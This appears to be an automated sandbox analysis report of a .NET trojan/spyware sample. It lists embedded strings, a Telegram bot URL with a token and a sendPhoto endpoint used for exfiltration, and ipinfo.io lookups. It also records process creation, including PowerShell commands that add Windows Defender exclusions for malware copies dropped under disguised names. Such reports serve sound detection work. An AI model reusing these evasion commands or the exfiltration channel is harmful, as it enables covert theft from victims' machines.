                          Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.000000000384B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                          Source: powershell.exe, 0000001A.00000002.3124943366.0000014AE8DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                          Source: powershell.exe, 0000001A.00000002.3124943366.0000014AE8DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                          Source: powershell.exe, 00000017.00000002.3244330908.000002B847530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                          Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io
                          Source: powershell.exe, 00000017.00000002.3013188018.000002B83F416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2977777373.0000023E331A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2830656459.0000013AD3805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000017.00000002.1826108573.000002B82F5C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23358000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0EB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC39B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1826108573.000002B82F3A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC3791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A7570E1000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.0000000003AA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000017.00000002.1826108573.000002B82F5C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23358000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0EB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC39B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: powershell.exe, 00000017.00000002.1826108573.000002B82F3A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC3791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A7570E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                          Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003815000.00000004.00000800.00020000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037DD000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                          Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6499149886:AAEaWHYhZxpFDZTcqGoOIgb5aWoEwpeON7Q/sendPhotoX
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: svchost.exe, 00000033.00000003.2049334674.000001F0A8E1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                          Source: powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 00000018.00000002.3244405482.0000023E3B510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
                          Source: powershell.exe, 0000001A.00000002.3163703892.0000014AE8FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5Consumers
                          Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.000000000378A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                          Source: W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037DD000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/country
                          Source: W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037DD000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip
                          Source: powershell.exe, 00000017.00000002.3013188018.000002B83F416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2977777373.0000023E331A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2830656459.0000013AD3805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                          Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49730 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49749 version: TLS 1.2
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWindow created: window name: CLIPBRDWNDCLASS
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMPJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMPJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeCode function: 0_2_00007FFD9B890DA80_2_00007FFD9B890DA8
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeCode function: 0_2_00007FFD9BA0018F0_2_00007FFD9BA0018F
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeCode function: 0_2_00007FFD9BC61B7F0_2_00007FFD9BC61B7F
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 19_2_00007FFD9B899FAF19_2_00007FFD9B899FAF
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 19_2_00007FFD9B8991DF19_2_00007FFD9B8991DF
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 19_2_00007FFD9B880DA819_2_00007FFD9B880DA8
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 19_2_00007FFD9B8C312D19_2_00007FFD9B8C312D
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 19_2_00007FFD9B8CB58D19_2_00007FFD9B8CB58D
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 19_2_00007FFD9B8CF88619_2_00007FFD9B8CF886
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 20_2_00007FFD9B899FAF20_2_00007FFD9B899FAF
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 20_2_00007FFD9B8991DF20_2_00007FFD9B8991DF
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 20_2_00007FFD9B8C312D20_2_00007FFD9B8C312D
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 20_2_00007FFD9B8CB58D20_2_00007FFD9B8CB58D
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 20_2_00007FFD9B8CF88620_2_00007FFD9B8CF886
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 20_2_00007FFD9B880DA820_2_00007FFD9B880DA8
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 21_2_00007FFD9B8A0DA821_2_00007FFD9B8A0DA8
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 21_2_00007FFD9B8B9FAF21_2_00007FFD9B8B9FAF
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 21_2_00007FFD9B8B91DF21_2_00007FFD9B8B91DF
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 21_2_00007FFD9B8E312D21_2_00007FFD9B8E312D
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 21_2_00007FFD9B8EB58D21_2_00007FFD9B8EB58D
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 21_2_00007FFD9B8EF88621_2_00007FFD9B8EF886
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 22_2_00007FFD9B880DA822_2_00007FFD9B880DA8
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 22_2_00007FFD9B8C312D22_2_00007FFD9B8C312D
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 22_2_00007FFD9B8CB58D22_2_00007FFD9B8CB58D
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 22_2_00007FFD9B8CF88622_2_00007FFD9B8CF886
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 22_2_00007FFD9B899FAF22_2_00007FFD9B899FAF
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 22_2_00007FFD9B8991DF22_2_00007FFD9B8991DF
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B9630E928_2_00007FFD9B9630E9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFD9B9730E930_2_00007FFD9B9730E9
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 38_2_00007FFD9B8D312D38_2_00007FFD9B8D312D
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 38_2_00007FFD9B8DB58D38_2_00007FFD9B8DB58D
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 38_2_00007FFD9B8DF88638_2_00007FFD9B8DF886
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 38_2_00007FFD9B8A9FAF38_2_00007FFD9B8A9FAF
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 38_2_00007FFD9B8A91DF38_2_00007FFD9B8A91DF
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 38_2_00007FFD9B890DA838_2_00007FFD9B890DA8
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 40_2_00007FFD9B8A0DA840_2_00007FFD9B8A0DA8
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 41_2_00007FFD9B8A0DA841_2_00007FFD9B8A0DA8
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 41_2_00007FFD9B8B9FAF41_2_00007FFD9B8B9FAF
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 41_2_00007FFD9B8B91DF41_2_00007FFD9B8B91DF
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 41_2_00007FFD9B8E312D41_2_00007FFD9B8E312D
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 41_2_00007FFD9B8EB58D41_2_00007FFD9B8EB58D
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 41_2_00007FFD9B8EF88641_2_00007FFD9B8EF886
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 44_2_00007FFD9B880DA844_2_00007FFD9B880DA8
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 44_2_00007FFD9B899EDD44_2_00007FFD9B899EDD
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 44_2_00007FFD9B8991DF44_2_00007FFD9B8991DF
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 44_2_00007FFD9B8C312D44_2_00007FFD9B8C312D
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 44_2_00007FFD9B8CF88644_2_00007FFD9B8CF886
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 44_2_00007FFD9B8CB58D44_2_00007FFD9B8CB58D
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 44_2_00007FFD9B9F018F44_2_00007FFD9B9F018F
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\BazpdGXT.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                          Source: W4tW72sfAD.exe, 00000000.00000000.1644759918.0000000000A12000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs W4tW72sfAD.exe
                          Source: W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs W4tW72sfAD.exe
                          Source: W4tW72sfAD.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
                          Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
                          Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
                          Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
                          Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@45/93@4/5
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exeJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\cnkBPSdA.logJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMutant created: NULL
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMutant created: \Sessions\1\BaseNamedObjects\Local\e185fbb618a233f9f6c1861641b571576fcfea1e7ff2912d0387b1f1e908cb75
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\AppData\Local\Temp\eqmixkc3Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat"
                          Source: W4tW72sfAD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: W4tW72sfAD.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: W4tW72sfAD.exeReversingLabs: Detection: 68%
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile read: C:\Users\user\Desktop\W4tW72sfAD.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\W4tW72sfAD.exe "C:\Users\user\Desktop\W4tW72sfAD.exe"
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCC57.tmp" "c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP"
                          Source: unknownProcess created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: unknownProcess created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: unknownProcess created: C:\Users\Public\Downloads\RuntimeBroker.exe C:\Users\Public\Downloads\RuntimeBroker.exe
                          Source: unknownProcess created: C:\Users\Public\Downloads\RuntimeBroker.exe C:\Users\Public\Downloads\RuntimeBroker.exe
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Source: unknownProcess created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                          Source: unknownProcess created: C:\Users\Public\Downloads\RuntimeBroker.exe "C:\Users\Public\Downloads\RuntimeBroker.exe"
                          Source: unknownProcess created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
